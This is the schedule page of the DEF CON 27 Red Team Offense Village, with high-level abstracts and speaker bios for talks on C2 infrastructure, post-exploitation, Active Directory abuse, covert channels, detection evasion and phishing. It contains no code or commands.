best website templates

© Copyright 2019 Red Team Offense Village - All Rights Reserved


The following is the schedule of the presentations at the DEF CON 27 Red Team Offense Village.

Friday, August 9

Saturday, August 10

Sunday, August 11

Abstracts and Bios


Kube-Red C2 Operations on Kubernetes

This talk explores deploying and dynamically generating C2 services on Kubernetes! Everything will be extremely practical with walkthroughs of detailed deployment configurations. Building containers for popular C2 platforms, such as Cobalt Strike, and many others, will be covered. Rapidly deploying complex C2 infrastructure using tools such as Kops and Drone and managing DNS and TLS using Kubernetes will be discussed. Attendees will learn how to build complex redirecting logic to sandbag defenders, using the rewriting and filtering capabilities found in the Nginx Ingress Controller, and the Istio Service Mesh. In addition, monitoring the health of implants using Prometheus will be reviewed.

About Larry Suto: Larry is an independent security consultant based out of Oakland, CA. He spends a lot of time researching using cloud infrastructure for all types of security testing. He spends some time on Windows security as well. Twitter: @larrysuto

Through the Looking Glass: Own the Data Center

The data center embodies the heart of many businesses on the Internet. It contains much of the information in a centralized location which provides a huge incentive for those who would wish harm. The data centers in the realm of Cloud may no longer contain just a single entity, but many individual tenants that attach to a common fabric. The Cisco Application Centric Infrastructure (ACI) aims to meet these needs with a multi-tenant, scalable fabric that interconnects physical hosts, VMs and containers. ACI is Cisco's answer to the centrally-managed Software Defined Network (SDN). The Application Policy Infrastructure Controller (APIC) and Nexus 9000 series switches form the brains and backbone of ACI.
A member of Cisco's Advanced Security Initiatives Group (ASIG) will demonstrate their findings during an evaluation of ACI and the APIC, more than three years before the BH2019 talk "APIC's Adventures in Wonderland." Step into the mind of an attacker and scan, probe, and interact with the network fabric to progress from an unauthenticated user to administrator and root of the data center switch fabric. Once inside the system, see how the APIC can be modified in a nearly undetectable manner to provide the attacker unfettered internal access to all the interconnected hosts and VMs in the data center. The target audience for this talk includes those with a technical interest in offensive discovery and secure product development. Participants will receive an overview of how a data center product is viewed in an offensive light.

About Chris McCoy: Chris is a technical leader in Cisco's Advanced Security Initiatives Group (ASIG) and published author of Security Penetration Testing, The Art of Hacking Series LiveLessons with Cisco Press. He has over 20 years of experience in the networking and security industry. He has a passion for computer security, finding flaws in mission-critical systems, and designing mitigations to thwart motivated and resourceful adversaries. He was formerly with Spirent Communications and the U.S. Air Force. Chris is CCIE certified (Emeritus) in the Routing & Switching and Service Provider tracks, which he has held for over 10 years. Twitter: @chris_mccoy

Bypassing MacOS Detections with Swift

This talk is centered around red teaming in MacOS environments. Traditionally, MacOS post exploitation has largely been done in python. However, as defender tradecraft continues to evolve with detecting suspicious python usage on MacOS, we (as red teamers) should consider migrating to different post exploitation methods. In this talk, I will share why the Swift language can be beneficial for red teaming macOS environments. I will also share some macOS post exploitation code I have written using the Swift programming language and contrast detection techniques between python and Swift based post exploitation.

High Level Outline:
- Intro
- Why Is This Talk Relevant to Red (and Blue) Teamers?
- Why Migrate Away from Python-Based MacOS Post Exploitation?
- Examples of Python-Based Post Exploitation
- Python-Based Post Exploitation Artifacts
- Brief Overview of Swift
- Why Use Swift For MacOS Post Exploitation?
- Examples of macOS post exploitation in Swift
- Share my Swift-based post exploitation code for red teamer use

About Cedric Owens: Cedric is an offensive security engineer with a blue team background. His passion revolves around red teams and blue teams working closely together to improve each other's tradecraft. Cedric enjoys writing useful red team utilities and periodically writing posts that are of interest to red and blue team team members on his blog at
Twitter: @cedowens

(Ab)using GPOs for Active Directory Pwnage

Identifying privilege escalation paths within an Active Directory environment is crucial for a successful red team. Over the last few years, BloodHound has made it easier for red teamers to perform reconnaissance activities and identify these attacks paths. When evaluating BloodHound data, it is common to find ourselves having sufficient rights to modify a Group Policy Object (GPO). This level of access allows us to perform a number of attacks, targeting any computer or user object controlled by the vulnerable GPO.

In this talk we will present previous research related to GPO abuses and share a number of misconfigurations we have found in the wild. We will also present a tool that allows red teamers to target users and computers controlled by a vulnerable GPO in order to escalate privileges and move laterally within the environment.

About Petros Koutroumpis: Petros Koutroumpis is a penetration tester for MWR InfoSecurity, where he has performed a number of purple team and adversary simulation assessments. His research is mainly focused on Active Directory exploitation and offensive tooling development. Twitter: @pkb1s

About Dennis Panagiotopoulos: Dennis Panagiotopoulos is a penetration tester at MWR InfoSecurity. He has performed a wide variety of engagements ranging from whitebox, objective-based assessments to red teams. His research interests are Windows post-exploitation and active directory. He likes to spent his free time developing new tools and contributing to open source projects for the InfoSec community. Twitter: @den_n1s

Injections Without Border: An anatomy of a Serverless Event Injections

Serverless applications have seen a significant rise in adoption in the past year. Along with its advantages, serverless architecture presents new security challenges. Some of these security threats are equal to those we know from traditional application development and some take a new form.

One particular example is the Injection attacks. Yes, SQL/NoSQL, OS and Code Injection attacks, they all still exist. But, when dealing with a monolithic application we only have one way in. What happens when we move to serverless architecture and we lose the perimeter? code is no longer executed directly, but is executed through cloud events. Whether it's a file upload, an email sent, a notification received or a simple log entry.

In this talk, I will examine the Serverless #1 risk: Event Injection and will demonstrate injection attacks form multiple event types.

About Tal Melamed: In the past year, Tal been experimenting in offensive and defensive security for the serverless technology, as part of his role as Head of Security Research at Protego Labs. Specializing in AppSec, he has more than 15 years of experience in security research and vulnerability assessment, previously working for leading security organizations such as Synack, AppSec Labs, CheckPoint, and RSA. Tal is also the leader and creator of the OWASP Serverless Top 10 and DVSA projects.
Twitter: @_nu11p0inter | @dvsaowasp

Introduction and Application of Covert Channels

Red Teams must operate under the radar, and one way to achieve that, or delay discovery of a communication method, is by using covert channels. In this talk, Aaron will quickly touch on the history and science behind covert channels, before diving into how they can be used to conceal active C2 channels. This talk will also cover a walkthrough of a stealthy ICMP covert channel, and general methodology of developing new covert channels for other protocols or communication mediums.
About Aaron "dyn" Grattafiori: Aaron "dyn" Grattafiori leads the Red Team at Facebook, where he focuses on offensive security, vulnerability research, adversary simulation, and performing bold full scope operations. Aaron has spoken at national security conferences such as Black Hat and DEFCON as well as regional conferences such as Toorcon and SOURCE. This will be Aaron's 16th DEFCON. Twitter: @dyn___


SiestaTime, A Red Team Automation Tool for Generation of Long-term Implants and Infrastructure Deployment  

Red Team operations require substantial efforts to both create implants and a resilient C2 infrastructure. SiestaTime aims to merge these ideas into a tool with an easy-to-use GUI, which facilitates implant and infrastructure automation. SiestaTime allows operators to provide registrar, SaaS and VPS credentials in order to deploy a resilient and ready to use Red Team infrastructure in less than five minutes. The generated implants will blend-in as legitimate traffic by communicating to the infrastructure using SaaS channels (e.g. GMail, Twitter). Use your VPS/Domains battery to deploy staging servers and inject your favorite shellcode for interactive sessions, clone sites and hide your implants ready to be downloaded, deploy more redirectors if they get busted‚ SiestaTime is built entirely in Golang, with the ability to generate Implants for multiple platforms, interact with different OS resources, and perform efficient C2 communications. Terraform will help to deploy/destroy different Infrastructure.

About Alvaro Folgado: Rebujacker works as a Product Security Engineer at Salesforce. He has multiple years of experience performing penetration tests, security assessment against different technologies, building automation tools for this purpose and performing application level researches. In the recent years his field of study has been focused into red teaming and automation. The combination of his application level and offensive security knowledge leads him to build better and stealthier implants that blends-in with nowadays cloud infrastructure and application stack of targeted organizations. Twitter: @rebujacker

Breaking NBAD and UEBA Detection

Network Behavior Anomaly Detection (NBAD) and User and Entity Behavior Analytics (UEBA) are heralded as machine learning fueled messiahs for finding advanced attacks. The data collection and processing methodologies of these approaches create a series of new exploitable vectors that can allow attackers to navigate network and systems undetected. In this session, methods for poisoning data, transforming calculations and preventing alerts will be examined. Proof of concept Python code will be demonstrated and made available. Approaches to harden against these attacks will also be discussed as well as outlining needed changes in detection standards.

About Charles: WitFoo Chief Technology Officer - Charles’ dedication to maturing the craft of InfoSec is built on a diverse career path across the industry. He started his career in InfoSec in the US Navy in 2002 serving as the Network Security Officer at the US Naval Postgraduate School. After leaving active duty, he was a contributing product reviewer for InfoWorld magazine focusing on network security products. Charles spent 7 years running Herring Consulting, a company dedicated to process orchestration, data sharing, and marketing. In 2012, Charles joined the Lancope team as a pre-sales engineer, promoted to Consulting Security Architect and later as Strategic Account Manager following the acquisition of Lancope by Cisco. In 2014, Charles partnered with veterans of the military, law enforcement and cybersecurity to research new approaches to improve the craft of cybersecurity operations. In 2016, that research resulted in the forming of WitFoo. When not working with cybersecurity heroes, Charles enjoys SCUBA divining with his wife, Mai. Twitter: @charlesherring

BadSalt (Adversarial DevOps)

SaltStack is robust configuration management utility used by many to achieve DevOps related initiatives in their organizations. Thanks to its open source model, SaltStack can be used by both hobbyist, hackers, and corporations alike. Like any open source tool suite out there, that also means individuals with adversarial intent, be it professional, or malicious, can also take advantage of this tool. In its most simple case, SaltStack can be used by an adversary as a simple Command and Control server (C2 server). However, if SaltStack is used as intended, an educated adversary can easily turn salt “bad” in more ways than simple command and control.
By re-configuring and automating basic settings within the Salt Master and Salt Minion configurations, it is easy to deploy SaltStack across many systems for any scenario. Coupling this ease of deployment with a basic understanding of configuration management, and scripted stagers, the result is a powerful post-exploitation framework with a built in C2 server, that is simply just SaltStack, but in use by an adversary. There are many benefits for using such a tool suite from an adversarial perspective such as, easily bypassing AV with trusted Salt Minions, and taking advantage of the desired state configurations to build out robust, scalable, post exploitation persistence modules.
Part of the research conducted was not just on how an adversary might use SaltStack, but also on how they might target a SaltStack environment. Man in the middle attacks are a concerning attack vector against Salt Minions at the time of this research. SaltStack has strong protections against this, but they are not enabled by default due to the need of manually distributing a unique public key. It is up to the individual(s) deploying SaltStack to be sure they enabled the proper security features to be safe from these attacks. Fortunately, SaltStack does have a few compensating controls that make this less likely after a successful deployment, but it is important that all SaltStack users are made aware of the importance and impact that just one particular setting can have on their infrastructure. Fortunately methods of detecting this activity are clear and well documented, but unfortunately a successful attack usually means root access on the target which could result in an adversary clearing their tracks. This could make it difficult to perform root cause analysis unless network traffic was analyzed at the time of the event.
The overall goal of this research is to show how advances in tools for perfectly legitimate Information Technology initiatives, like DevOps, can be turned into sophisticated tool suites for attackers. In true hacker spirit, this technology can be used for completely unintended purposes. This presentation will provide the insight to how SaltStack could be attacked or used in an adversarial context, and also how those attacks or uses could be detected and prevented.

About Casey Erdmann: Casey Erdmann, also known as 3ndG4me by his CTF team mates and online social communities, is an avid offensive security nerd. Casey is 23 years old, and has a love for CTFs and application security. He is the co-founder of DC706, and is active in his local computer security community. Casey has been responsible for implementing infrastructure for local high-school CTF competitions, and coaching his local university’s SECCDC team. Casey is also responsible for developing the OpenVPN Connect module for the WiFi Pineapple, as well as Propane King of the Hill, a NetKotH rewrite inspired by members of DC 404. When he isn’t writing neat tools, or reaching out to his local community, Casey spends about 90% of his free time researching the latest offensive security news/techniques and playing CTFs trying to “get good”, with the other 10% being writing music, playing video games, or optional sleep. Twitter: @3ndG4me_

Red Team Framework (RTF)

Abstract and Bio coming soon!

WebSploit 2.0 Release and an Intense Introduction to Hacking Web Applications and APIs 

In this talk a new version of the self-contained WebSploit VM will be released. WebSploit was created by Omar Santos for different Cybersecurity Ethical Hacking training sessions that have been delivered in several outlets.This VM contains hundreds of exercises from known intentionally vulnerable applications running in Docker containers on top of Kali Linux; and it also includes several additional tools and a mobile device emulator that can be used to test APIs. Omar will go over several demonstrations on how to get started with this collection of hundreds of exercises and participants will receive a lab guide that they can complete in their own time (which covers dozens of exercises).

About Omar Santos: Ωr is an active member of the security community, where he leads several industry-wide initiatives and standard bodies. His active role helps businesses, academic institutions, state and local law enforcement agencies, and other participants that are dedicated to increasing the security of the critical infrastructure. Omar is the author of over 20 books and video courses; numerous white papers, articles, and security configuration guidelines and best practices. Omar is a Principal Engineer of Cisco’s Product Security Incident Response Team (PSIRT) where he mentors and lead engineers and incident managers during the investigation and resolution of security vulnerabilities. Twitter: @santosomar

Casting with the Pros: Tips and Tricks for Effective Phishing

 Phishing seems easy enough, but getting successful results can be difficult. In this talk we'll walk through practical tips for getting better responses. We'll talk about target selection, ruse development, technology deployment, and suggestions for working with clients to maximize the value of the assessment.

About Nathan Sweaney: Nathan works for Secure Ideas testing pens and consulting clients. He's been in the infosec industry for a decade or so working with a wide range of clients and technologies. He's regularly told that he takes all of the fun out of things and is eager to argue about politics and religion. Hailing from the great state of Oklahoma, he hopes you'll all keep flying over it & leave us alone. Twitter: @sweaney


State of Red Team Services Roundtable

Wesley McGrew, Director of Cyber Operations at HORNE Cyber, leads a panel discussion, taking a frank look of the state of offense-oriented services, such as penetration tests and red team engagements. The goal is to look at the current state of offense-oriented services, and discuss what it will take for the discipline to mature and adapt.

Among the topics open for discussion:
- Terminology
- Trends in penetration testing and red teaming
- Managing large scale engagements
- Tradecraft
- Client interactions
- Effective reporting

Dr. McGrew will present questions to a panel of red team professionals, and chime in with his outlook as well. Questions for the panel will also be solicited from the audience.
The panel will try to address the issues faced by experienced red team and related service professionals, and those that manage the engagements. Those getting started in this field are encouraged to attend in order to see the evolving structure of this industry, beyond entry-level jobs.

About Dr. Wesley McGrew:  As Director of Cyber Operations at HORNE Cyber, Wesley McGrew oversees and participates in offense-oriented services for clients in many areas, including finance, healthcare, manufacturing, and national critical infrastructure. He has presented on topics of penetration testing and and malware analysis at DEF CON and Black Hat USA. He teaches a self-designed course on reverse engineering to students at Mississippi State University, using real-world, high-profile malware samples. Wesley has a Ph.D. in Computer Science from Mississippi State University for his research in vulnerability analysis of SCADA HMI systems.Twitter: @McGrewSecurity

Puny Charge your Phishing Campaigns

Verizon's 2019 Data Breach Investigation Report (DBIR) indicates that malware is delivered via email in 94% of investigated breaches. Business Email Compromise (BEC) is on the rise. Phishing is still a problem for most organizations. A good phishing campaign is still an easy win for a Red Teamer, though it’s a constant cat-and-mouse game as email gateways deploy new techniques for anti-spoofing and malware detection. This talk will discuss research and browser/app testing around using Puny Code to create solid doppelganger domains for phishing campaigns, watering hole attacks and other creative shenanigans. Using techniques discussed in this talk, you all be able to clone your target's domain name(s) appearing identical to the naked eye. Passing SSL/TLS verification, bypassing security awareness training, and any in-house phishing campaigns your Blue Team might have implemented, this is a $12 technique you must see.

About Michael Wylie: Michael Wylie, MBA, CISSP is the Director of Cybersecurity Services at Richey May Technology Solutions. In his role, Michael is responsible for delivering information assurance by means of vulnerability assessments, cloud security, penetration tests, risk management, and training. Michael has developed and taught numerous courses for the U.S. Department of Defense, Moorpark College, California State Universities, and for clients around the world. Michael is the winner of the SANS Continuous Monitoring and Security Operations challenge coin and holds the following credentials: CISSP, CCNA R&S, CCNA CyberOps, GPEN, TPN, CEH, CEI, VCP-DCV, CHPA, PenTest+, Security+, Project+, and more. Twitter: @TheMikeWylie

A Panel and Active Discussion: Red Team Career Advise 

A pannel of several Red Team members to talk about Red Team and Offensive Security career advise. This will also be an active discussion with the audience! This is a great opportunity to learn from others and also share your experience, highlight how you got started, and how you became a leader in your field.